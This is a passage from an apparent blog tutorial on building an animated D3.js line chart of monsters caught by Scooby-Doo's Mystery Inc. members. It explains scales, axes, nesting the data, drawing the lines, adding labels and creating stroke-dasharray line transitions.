&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .range([ &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, plotWidth ]);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// y-axis values to cumulative caught range
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// y-axis goes from height of plot to 0
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;let&lt;/span&gt; yAxis &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; d3.scaleLinear()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .domain(d3.extent(data, d =&amp;gt; { &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; d.cumulative_caught; }))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .range([ plotHeight, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;]);
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We set the limits of the x- and y-axes to be between the min and max of
the respective columns (returned by &lt;code&gt;d3.extent&lt;/code&gt; with an anonymous
function returning all values from our respective columns). We then
define the actual length of our axes to be our full plot width and plot
height. Notice that the range of the y-axis runs from plot height to 0:
SVG y coordinates increase downwards, so the smallest value sits at the
bottom of the plot and the largest at the top.&lt;/p&gt;
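&lt;p&gt;To make the inverted y range concrete, here is a minimal sketch in plain JavaScript of the kind of mapping a linear scale performs. The helpers &lt;code&gt;linearScale()&lt;/code&gt; and &lt;code&gt;extent()&lt;/code&gt; are hypothetical stand-ins written for illustration, not D3 functions, and the sample rows are made up.&lt;/p&gt;

```javascript
// Hypothetical stand-in for a linear scale: maps a domain onto a range.
function linearScale(domain, range) {
  const d0 = domain[0], d1 = domain[1];
  const r0 = range[0], r1 = range[1];
  return function (value) {
    return r0 + ((value - d0) / (d1 - d0)) * (r1 - r0);
  };
}

// Hypothetical stand-in for an extent helper: [min, max] of a column.
function extent(rows, accessor) {
  const values = rows.map(accessor);
  return [Math.min(...values), Math.max(...values)];
}

// Made-up rows, for illustration only.
const sampleRows = [
  { year: 1969, cumulative_caught: 0 },
  { year: 1995, cumulative_caught: 50 },
  { year: 2021, cumulative_caught: 100 }
];

const sampleHeight = 280; // 400 - 80 - 40, as in the constants above

// Range runs from plot height to 0, so larger values land nearer the top.
const yScale = linearScale(
  extent(sampleRows, function (d) { return d.cumulative_caught; }),
  [sampleHeight, 0]
);

console.log(yScale(0), yScale(50), yScale(100)); // prints: 280 140 0
```

&lt;p&gt;The smallest value maps to 280 pixels from the top (the bottom of the plot) and the largest maps to 0 (the top).&lt;/p&gt;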
&lt;p&gt;Then, let’s add these axes to the plot. We move the x axis to the
bottom of the plot and draw it with &lt;code&gt;d3.axisBottom&lt;/code&gt;, a built-in D3
function that creates a bottom horizontal axis. The y axis is drawn with
&lt;code&gt;d3.axisLeft&lt;/code&gt;, which creates a left vertical axis. Both require a scale (which we created with
&lt;code&gt;d3.scaleLinear&lt;/code&gt; in our &lt;code&gt;xAxis&lt;/code&gt; and &lt;code&gt;yAxis&lt;/code&gt; functions). We also set
stroke widths and font sizes for both axes.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// add x-axis to plot
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// move x axis to bottom of plot (height)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// format tick values as date (no comma in e.g. 2,001)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// set stroke width and font size
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;plotGroup.append(&lt;span style="color:#a5d6ff"&gt;&amp;#34;g&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;transform&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;translate(0,&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; plotHeight &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;)&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .call(d3.axisBottom(xAxis).tickFormat(d3.format(&lt;span style="color:#a5d6ff"&gt;&amp;#34;d&amp;#34;&lt;/span&gt;)))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;stroke-width&amp;#34;&lt;/span&gt;, lineWidth)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;font-size&amp;#34;&lt;/span&gt;, mediumText);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// add y-axis to plot
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// set stroke width and font size
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;plotGroup.append(&lt;span style="color:#a5d6ff"&gt;&amp;#34;g&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .call(d3.axisLeft(yAxis))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;stroke-width&amp;#34;&lt;/span&gt;, lineWidth)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;font-size&amp;#34;&lt;/span&gt;, mediumText);
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;svg id="scooby1"&gt;
&lt;/svg&gt;
&lt;script src="https://www.jumpingrivers.com/blog/r-d3-intro-r2d3/scooby_scripts/scoobydoo_1.js"&gt;&lt;/script&gt;
&lt;h2 id="adding-lines"&gt;Adding lines&lt;/h2&gt;
&lt;p&gt;Now, we need to reformat our data slightly to be able to create a line
chart with multiple lines. Each line will represent a Mystery
Inc. member, so we want to create a hierarchical tree structure with
the data for each character nested inside a separate key.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// turns data into nested structure for multiple line chart
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// d3.nest() no longer available in D3 v6 and above hence version set to 5
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;let&lt;/span&gt; nestedData &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; d3.nest()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .key(d =&amp;gt; { &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; d.character;})
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .entries(data);
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Here, &lt;code&gt;d =&amp;gt; {return d.character}&lt;/code&gt; defines an anonymous function which
takes a row of our data as input and returns its character, so that
&lt;code&gt;key()&lt;/code&gt; can create a separate key for each character. We then
pass the data to &lt;code&gt;entries()&lt;/code&gt;, which stores the rows belonging to each
character under that character’s key. You can investigate the structure of the nested data
by running &lt;code&gt;nestedData&lt;/code&gt; in the JavaScript console when in “Inspect
Element” mode.&lt;/p&gt;
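&lt;p&gt;If you would rather see the shape of the nested data before opening the console, the following plain JavaScript sketch builds a comparable structure by hand: an array with one object per character, each holding a &lt;code&gt;key&lt;/code&gt; and a &lt;code&gt;values&lt;/code&gt; array. The helper &lt;code&gt;nestByKey()&lt;/code&gt; is hypothetical and written for illustration, and the rows are made up.&lt;/p&gt;

```javascript
// Hypothetical helper: groups rows into [{ key, values }, ...],
// preserving the order in which each key first appears.
function nestByKey(rows, keyFn) {
  const groups = new Map();
  rows.forEach(function (row) {
    const key = String(keyFn(row));
    if (!groups.has(key)) {
      groups.set(key, []);
    }
    groups.get(key).push(row);
  });
  return Array.from(groups, function (entry) {
    return { key: entry[0], values: entry[1] };
  });
}

// Made-up rows, for illustration only.
const exampleRows = [
  { character: "Fred", year: 1969, cumulative_caught: 1, color: "#76a2ca" },
  { character: "Velma", year: 1969, cumulative_caught: 2, color: "#cd7e05" },
  { character: "Fred", year: 1970, cumulative_caught: 3, color: "#76a2ca" }
];

const exampleNested = nestByKey(exampleRows, function (d) {
  return d.character;
});

console.log(exampleNested.map(function (group) {
  return group.key + ": " + group.values.length + " rows";
}).join(", ")); // prints: Fred: 2 rows, Velma: 1 rows
```

&lt;p&gt;This is why the later code reads values such as &lt;code&gt;d.values[0].color&lt;/code&gt;: each group carries its own rows in &lt;code&gt;values&lt;/code&gt;.&lt;/p&gt;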
&lt;p&gt;Then, we create a path element with a new class of our own,
&lt;code&gt;drawn_lines&lt;/code&gt; (the class attribute accepts whatever name we choose),
so that we can access this specific path element
later on. We define another anonymous function to color the line by the
hex codes in our color column. Finally, we define how we want the path
to use our data: it will be a line (&lt;code&gt;d3.line&lt;/code&gt;) whose x position is
determined by our &lt;code&gt;year&lt;/code&gt; column, and y position by our
&lt;code&gt;cumulative_caught&lt;/code&gt; column.&lt;/p&gt;
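&lt;p&gt;The &lt;code&gt;d&lt;/code&gt; attribute of a path is just a string of drawing commands. As a rough sketch of what a straight-line generator produces, the plain JavaScript below builds such a string by hand: &lt;code&gt;M&lt;/code&gt; moves to the first point and &lt;code&gt;L&lt;/code&gt; draws a line to each following point. The helper &lt;code&gt;linePath()&lt;/code&gt;, the two toy scales and the points are all assumptions made for illustration.&lt;/p&gt;

```javascript
// Hypothetical helper: turns scaled points into an SVG path string.
function linePath(points, xScale, yScale) {
  return points.map(function (point, index) {
    const command = index === 0 ? "M" : "L";
    return command + xScale(point.year) + "," + yScale(point.cumulative_caught);
  }).join("");
}

// Toy scales, for illustration only: 10 pixels per year, inverted y.
function toyX(year) { return (year - 1969) * 10; }
function toyY(caught) { return 280 - caught; }

// Made-up points for one character.
const examplePoints = [
  { year: 1969, cumulative_caught: 0 },
  { year: 1970, cumulative_caught: 5 },
  { year: 1971, cumulative_caught: 20 }
];

const examplePath = linePath(examplePoints, toyX, toyY);
console.log(examplePath); // prints: M0,280L10,275L20,260
```

&lt;p&gt;Inspecting a drawn line in the browser should show a &lt;code&gt;d&lt;/code&gt; attribute of the same general form, with one command per data point.&lt;/p&gt;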
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;let&lt;/span&gt; path &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; plotGroup.selectAll(&lt;span style="color:#a5d6ff"&gt;&amp;#34;.drawn_lines&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .data(nestedData)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .enter()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .append(&lt;span style="color:#a5d6ff"&gt;&amp;#34;path&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// set up class so only this path element can be removed
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;class&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;drawn_lines&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;fill&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;none&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// color of lines from hex codes in data
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;stroke&amp;#34;&lt;/span&gt;, d =&amp;gt; {&lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; d.values[&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;].color})
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;stroke-width&amp;#34;&lt;/span&gt;, lineWidth)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// draw line according to data
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;d&amp;#34;&lt;/span&gt;, d =&amp;gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; d3.line()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .x(d =&amp;gt; { &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; xAxis(d.year);})
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .y(d =&amp;gt; { &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; yAxis(d.cumulative_caught);})
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (d.values)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;svg id="scooby2"&gt;
&lt;/svg&gt;
&lt;script src="https://www.jumpingrivers.com/blog/r-d3-intro-r2d3/scooby_scripts/scoobydoo_2.js"&gt;&lt;/script&gt;
&lt;h2 id="adding-text"&gt;Adding text&lt;/h2&gt;
&lt;p&gt;Now we will add a plot title. Create a text element for the plot title,
defining where it is anchored, the x and y position of the anchor, what
the actual text says, and its color, font size and font weight. We
append the text to the whole SVG, rather than just the plot, so that the
title sits above the tallest point of the y axis (the top edge of the &lt;code&gt;plotGroup&lt;/code&gt;).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// create plot title
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;svg.append(&lt;span style="color:#a5d6ff"&gt;&amp;#34;text&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;text-anchor&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;start&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;x&amp;#34;&lt;/span&gt;, margin.left)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;y&amp;#34;&lt;/span&gt;, margin.top&lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .text(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Monsters caught by Mystery Inc. members&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;fill&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;black&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;font-size&amp;#34;&lt;/span&gt;, bigText)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;font-weight&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;bold&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now we’ll create legend labels for each line which will identify which
character each line belongs to. Here, we create another group in our
plot that is going to contain text from &lt;code&gt;nestedData&lt;/code&gt;. We set some
attributes in terms of how it will look, as well as give it a custom
class &lt;code&gt;name_labels&lt;/code&gt;. We also decide where these labels will go, giving
them an x position slightly after the last data point on the x axis
(2021) and a y position based on the location of the final value on the
y axis (where the line ends). The text and color of the label will
depend on the character and color columns in the dataset.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// create legend labels i.e. character names
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;plotGroup.append(&lt;span style="color:#a5d6ff"&gt;&amp;#34;g&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .selectAll(&lt;span style="color:#a5d6ff"&gt;&amp;#34;text&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .data(nestedData)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .enter()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .append(&lt;span style="color:#a5d6ff"&gt;&amp;#34;text&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// add class so name_labels can be removed in drawLines()
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;class&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;name_labels&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .style(&lt;span style="color:#a5d6ff"&gt;&amp;#34;font-weight&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;bold&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .style(&lt;span style="color:#a5d6ff"&gt;&amp;#34;font-size&amp;#34;&lt;/span&gt;, mediumText)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// set location for labels (at the end)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;x&amp;#34;&lt;/span&gt;, xAxis(&lt;span style="color:#a5d6ff"&gt;2021&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; mediumText&lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;y&amp;#34;&lt;/span&gt;, (d, i) =&amp;gt; yAxis(d.values[d.values.length&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;].cumulative_caught) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; mediumText&lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;fill&amp;#34;&lt;/span&gt;, d =&amp;gt; {&lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; d.values[&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;].color})
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .text(d =&amp;gt; {&lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; d.values[&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;].character})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;svg id="scooby3"&gt;
&lt;/svg&gt;
&lt;script src="https://www.jumpingrivers.com/blog/r-d3-intro-r2d3/scooby_scripts/scoobydoo_3.js"&gt;&lt;/script&gt;
&lt;h2 id="adding-transitions"&gt;Adding transitions&lt;/h2&gt;
&lt;p&gt;First, we will add a transition for the labels we just created. By
wrapping our plot-creating code in functions we can recreate the plot at
specific times. We will start by wrapping everything in the previous
chunk inside a function called &lt;code&gt;drawLabels()&lt;/code&gt; and add a transition which
raises the opacity of the labels from 0 to 1 over 500 milliseconds, giving them a “fade in”
effect.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;function&lt;/span&gt; drawLabels() {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;insert code from previous chunk &lt;span style="color:#ff7b72"&gt;in&lt;/span&gt; here&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;opacity&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .transition()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .duration(&lt;span style="color:#a5d6ff"&gt;500&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;opacity&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We are also going to create a transition for the lines that makes them
appear as if they’re being drawn from start to end. Unfortunately,
the easiest way to do this relies on some trickery with the
&lt;code&gt;stroke-dasharray&lt;/code&gt; attribute of each line. This attribute defines the
dashed pattern of a line. So far, the lines on our plot are completely
solid. We will introduce a dash pattern whose gap is as long as the
line itself, so that nothing is visible at first. We then grow the dash
from zero to the full length of the line to make it appear that the
line is growing over time.&lt;/p&gt;
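&lt;p&gt;To see the trick in isolation, here is a small plain JavaScript sketch of the dash pattern at a few moments during the animation. It mirrors the interpolation from &lt;code&gt;0,l&lt;/code&gt; to &lt;code&gt;l,l&lt;/code&gt; used in &lt;code&gt;tweenDash()&lt;/code&gt;, where &lt;code&gt;l&lt;/code&gt; is the total length of the line. The helper &lt;code&gt;dashFrame()&lt;/code&gt; and the path length of 400 are assumptions made for illustration.&lt;/p&gt;

```javascript
// Hypothetical helper: dash pattern at progress t (0 = start, 1 = end).
function dashFrame(totalLength, t) {
  const dash = totalLength * t; // visible part of the line so far
  const gap = totalLength;      // gap long enough to hide the rest
  return dash + "," + gap;
}

const exampleLength = 400; // made-up path length in pixels

const frames = [0, 0.25, 0.5, 1].map(function (t) {
  return dashFrame(exampleLength, t);
});

console.log(frames.join(" | ")); // prints: 0,400 | 100,400 | 200,400 | 400,400
```

&lt;p&gt;At the start the dash has zero length, so the line is invisible. At the end the dash is as long as the line, so the whole line is drawn.&lt;/p&gt;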
&lt;p&gt;To do this, we need to create two functions. The first, &lt;code&gt;tweenDash()&lt;/code&gt;,
returns a function that takes the &lt;code&gt;stroke-dasharray&lt;/code&gt; attribute of a line as
an argument, then manipulates it to get the next “frame” of the
animation. This keeps looping until the dash covers the entire
length of the line, making it fully visible, which takes 2500ms
as defined by &lt;code&gt;duration(2500)&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The other function, &lt;code&gt;lineTransition()&lt;/code&gt;, takes a path (i.e. line) as an
argument and passes that path’s &lt;code&gt;stroke-dasharray&lt;/code&gt; attribute into the
function returned by &lt;code&gt;tweenDash()&lt;/code&gt;. It then applies the new dash
configuration to the path. Note that when the transition ends
(&lt;code&gt;.on(&amp;quot;end&amp;quot;, ...)&lt;/code&gt;), our &lt;code&gt;drawLabels&lt;/code&gt; function is called. This is to
ensure that the labels appear only when the lines have fully appeared.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;function&lt;/span&gt; tweenDash() {
